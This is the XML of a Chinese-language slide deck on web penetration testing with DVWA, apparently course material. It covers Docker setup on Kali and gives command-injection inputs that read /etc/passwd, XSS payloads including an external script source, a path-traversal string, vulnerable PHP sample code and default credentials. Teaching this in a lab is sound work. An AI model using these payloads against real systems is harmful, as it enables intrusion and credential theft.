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8"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="294" r:id="rId3"/>
    <p:sldId id="32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19" r:id="rId13"/>
    <p:sldId id="322" r:id="rId14"/>
    <p:sldId id="328" r:id="rId15"/>
    <p:sldId id="323" r:id="rId16"/>
    <p:sldId id="324" r:id="rId17"/>
    <p:sldId id="325" r:id="rId18"/>
    <p:sldId id="326" r:id="rId19"/>
    <p:sldId id="327" r:id="rId20"/>
    <p:sldId id="320" r:id="rId21"/>
    <p:sldId id="266" r:id="rId22"/>
    <p:sldId id="321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7D05-9113-4C81-BFDD-8EA3971894D9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4C8B4-E0A1-47A6-A427-48E979EBB0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00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96DE4A5-82D5-1D62-B3A5-8010777A9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83AD2E67-5FB9-BDD1-336D-7F7B3E6EC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10D2B53D-1A0C-930D-B647-04D181988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39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F0859A8-A97B-5235-A5CD-B2D2042C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421DB4BF-D935-C265-28FE-B730B307E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C1D4388D-E26D-BECD-B104-B14178F08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64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5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042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140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831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38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016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0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646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40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11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520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038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40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395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983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08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44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80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6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690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643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75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363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888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313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85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84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1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04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8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22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1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2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0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6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網站</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>滲透測試實務</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>DVWA測試</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>案例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94575" y="214219"/>
            <a:ext cx="84506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下載image:: docker pull XXXXX/YYYY</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="145" name="Google Shape;14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497" y="1690689"/>
            <a:ext cx="8190853" cy="3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657931" y="5387171"/>
            <a:ext cx="73478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 vulnerables/web-dvwa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61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277668" y="115745"/>
            <a:ext cx="1375641" cy="10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啟動</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="153" name="Google Shape;15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/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="1046126"/>
            <a:ext cx="77764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 -p 80:80 -t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citizenstig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dvwa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83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606408"/>
            <a:ext cx="7772400" cy="3080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549" y="268378"/>
            <a:ext cx="67077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admin/password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9741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35806"/>
            <a:ext cx="7772400" cy="32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97B2E889-51DC-886A-CB5F-0AC7A625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E920DA27-EA67-C745-3211-84846AB89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81EB4B92-29AB-87FA-A891-7B066B9C7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3636316F-2367-CDB2-39F3-20E999BDDB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r>
              <a:rPr lang="zh-TW" alt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建置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Docker +DVWA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03243D44-48B4-6474-86BC-C8C6D11D82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72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5722"/>
            <a:ext cx="5739938" cy="64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37" y="484631"/>
            <a:ext cx="6099263" cy="60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71" y="1767551"/>
            <a:ext cx="6905625" cy="3943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8290" y="1289304"/>
            <a:ext cx="198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29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8136" y="833643"/>
            <a:ext cx="518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www.ksu.edu.tw; cat /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>/passwd;echoa888168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31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515" y="590862"/>
            <a:ext cx="76726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if( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>isset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>( $_POST[ 'Submit' ]  ) ) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>    // Get input</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>    $target = $_REQUEST[ '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>' ];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>    // Determine OS and execute the ping command.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>    if( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>stristr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>php_uname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>( 's' ), 'Windows NT' ) ) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>        // Windows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' . $target );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else {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>        // *nix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-c 4 ' . $target );</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>    }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>    // Feedback for the end user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>    echo "&lt;pre&gt;{$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>}&lt;/pre&gt;";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?&gt;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05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53717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3845" y="1403604"/>
            <a:ext cx="8100753" cy="4050792"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>DVWA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>實戰</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>DVWA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>DVWA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>系統建置</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>DVWA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>測試</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>SQLi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>  COMMAND injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>  upload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>上傳漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>  directory travel</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="271331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49" y="2120900"/>
            <a:ext cx="724050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要先設定資料庫</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="161" name="Google Shape;16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58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323" y="484632"/>
            <a:ext cx="5016204" cy="56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7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預設帳密:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="3600"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="3600"/>
              <a:t>Username: admin</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="3600"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="3600"/>
              <a:t>Password: password</a:t>
            </a:r>
            <a:endParaRPr sz="3600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="168" name="Google Shape;16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2124364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DVWA漏洞測試初體驗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4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6534" y="235816"/>
            <a:ext cx="7500240" cy="640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285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490106" y="577563"/>
            <a:ext cx="3887932" cy="75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四種安全等級</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="189" name="Google Shape;18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25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342322" y="235817"/>
            <a:ext cx="7886700" cy="78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正常輸入::216.58.200.36</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="204" name="Google Shape;20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3310" y="892753"/>
            <a:ext cx="773571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3464" y="3314031"/>
            <a:ext cx="5394863" cy="3178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22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測試型輸入::216.58.200.36;ls</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="212" name="Google Shape;21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73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B10501C-85AE-39B8-BE2A-C0399BDD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370A83C8-F3F2-B509-6356-4CB6B0CFD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2548A813-ECE9-CF50-8EA3-5980AE785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78D9933E-404A-F770-578C-C76467E59BF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DVWA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95659327-5B6C-2514-F133-BF3F04A972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 cd .. &amp;&amp; cd ..&amp;&amp; cat /etc/passwd</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="219" name="Google Shape;219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818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SQLi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894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34" name="Google Shape;23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4124" y="1690689"/>
            <a:ext cx="4426080" cy="2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5104" y="3526234"/>
            <a:ext cx="4310246" cy="2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01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測試輸入</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="242" name="Google Shape;242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42907"/>
            <a:ext cx="4267570" cy="28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671" y="2868470"/>
            <a:ext cx="5277679" cy="372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116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Reflected Cross Site Scripting (XSS)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252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58" name="Google Shape;25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2316" y="1500788"/>
            <a:ext cx="4365114" cy="296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066" y="3456813"/>
            <a:ext cx="6854318" cy="296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57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簡單的XSS payload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alert("XSS!");&lt;/script&gt;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alert(document.cookie)&lt;/script&gt;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&lt;iframe width=333 height=333 src=tw.yahoo.com&gt; &lt;/iframe&gt;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00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測試型輸入::輸入XSS payload</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="273" name="Google Shape;2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8723" y="2078615"/>
            <a:ext cx="7370543" cy="32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2893705" y="1429079"/>
            <a:ext cx="49782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輸入&lt;script&gt;alert(/xss/)&lt;/script&gt;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598" y="3751552"/>
            <a:ext cx="7608667" cy="27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140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練習使用底下技術測試看看:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet</a:t>
            </a:r>
            <a:endParaRPr sz="2000"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748723" y="1576244"/>
            <a:ext cx="7886700" cy="54812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&lt;SCRIPT SRC=http://xss.rocks/xss.js&gt;&lt;/SCRIPT&gt;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124364"/>
            <a:ext cx="7730398" cy="43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37" y="4716892"/>
            <a:ext cx="8624236" cy="136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692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64837" y="625296"/>
            <a:ext cx="8003308" cy="92333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javascript:/*--&gt; &lt;/title&gt;&lt;/style&gt;&lt;/textarea&gt;&lt;/script&gt;&lt;/xmp&gt;&lt;svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'&gt;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9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r>
              <a:rPr lang="zh-TW" alt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建置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Docker +DVWA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064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&lt; “&gt;&lt;/iframe&gt;&lt;script&gt;alert(123)&lt;/script&gt; &lt;body onLoad=”while(true) alert(‘XSS’);”&gt; ‘”&gt;&lt;/title&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="298" name="Google Shape;298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10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Stored Cross Site Scripting (XSS)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17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047423" cy="87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</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="313" name="Google Shape;31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120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20" name="Google Shape;32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3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Inclusion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303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點選看看</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>網址欄</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>會有甚麼變化</a:t>
            </a:r>
            <a:endParaRPr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074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page=../../../../../../etc/passwd</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="342" name="Google Shape;342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42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6012295" cy="89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在Kali Linux 安裝Docker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[1]設定 Docker APT repository (Kali is based on Debian):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echo 'deb [arch=amd64] https://download.docker.com/linux/debian buster stable' &gt; /etc/apt/sources.list.d/docker.list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[2]更新APT:    apt-get update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[3]安裝 Docker:先移除舊版的{如果之前有安裝}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remove docker docker-engine docker.io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[4]再安裝 Docker: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install docker-ce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[5]測試看看是否成功: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docker run hello-world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97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啟動docker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installation, Docker service will be started, but not enabled (i.e. it will not be started automatically after reboot). To start it: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start docker</a:t>
            </a:r>
            <a:endParaRPr sz="360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start Docker automatically upon reboot (do it on your own risk!):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enable docker</a:t>
            </a:r>
            <a:endParaRPr sz="3600">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill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46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430624" y="662271"/>
            <a:ext cx="73833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查看使用的版本   docker version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430624" y="5209801"/>
            <a:ext cx="8406049" cy="119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/>
              <a:t>更多docker指令請參閱</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" b="1"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="2800" b="1"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1"/>
              <a:t>https://philipzheng.gitbooks.io/docker_practice/content/</a:t>
            </a:r>
            <a:endParaRPr sz="2800" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="124" name="Google Shape;124;p5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1158605" y="1674152"/>
            <a:ext cx="3982244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stop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image ls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281408" y="3770807"/>
            <a:ext cx="2922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檢視有多少已下載的images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7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2" name="Google Shape;1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58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Google搜尋dvwa docker</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="138" name="Google Shape;13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4786" y="1831440"/>
            <a:ext cx="6972198" cy="451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591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110</TotalTime>
  <Words>663</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>如螢幕大小 (4:3)</PresentationFormat>
  <Paragraphs>138</Paragraphs>
  <Slides>46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Noto Sans Symbols</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Rockwell</vt:lpstr>
      <vt:lpstr>Rockwell Condensed</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>木刻字型</vt:lpstr>
      <vt:lpstr>網站滲透測試實務 DVWA測試案例</vt:lpstr>
      <vt:lpstr>agenda</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>在Kali Linux 安裝Docker</vt:lpstr>
      <vt:lpstr>啟動docker</vt:lpstr>
      <vt:lpstr>更多docker指令請參閱  https://philipzheng.gitbooks.io/docker_practice/content/</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>Google搜尋dvwa docker</vt:lpstr>
      <vt:lpstr>下載image:: docker pull XXXXX/YYYY</vt:lpstr>
      <vt:lpstr>啟動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要先設定資料庫</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>預設帳密: Username: admin Password: password</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>四種安全等級</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>正常輸入::216.58.200.36</vt:lpstr>
      <vt:lpstr>測試型輸入::216.58.200.36;ls</vt:lpstr>
      <vt:lpstr>測試型輸入::216.58.200.36; cd .. &amp;&amp; cd ..&amp;&amp; cat /etc/passwd</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>正常輸入</vt:lpstr>
      <vt:lpstr>測試輸入</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>正常輸入</vt:lpstr>
      <vt:lpstr>簡單的XSS payload</vt:lpstr>
      <vt:lpstr>測試型輸入::輸入XSS payload</vt:lpstr>
      <vt:lpstr>練習使用底下技術測試看看: https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>&lt; “&gt;&lt;/iframe&gt;&lt;script&gt;alert(123)&lt;/script&gt; &lt;body onLoad=”while(true) alert(‘XSS’);”&gt; ‘”&gt;&lt;/title&gt;</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>測試型輸入</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>點選看看網址欄會有甚麼變化</vt:lpstr>
      <vt:lpstr>page=../../../../../../etc/passwd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網站滲透測試實務 DVWA測試案例</dc:title>
  <dc:creator>user</dc:creator>
  <cp:lastModifiedBy>KSU</cp:lastModifiedBy>
  <cp:revision>13</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-10-17T06:23:30Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-12-18T02:08:57Z</dcterms:modified>
</cp:coreProperties>
</file>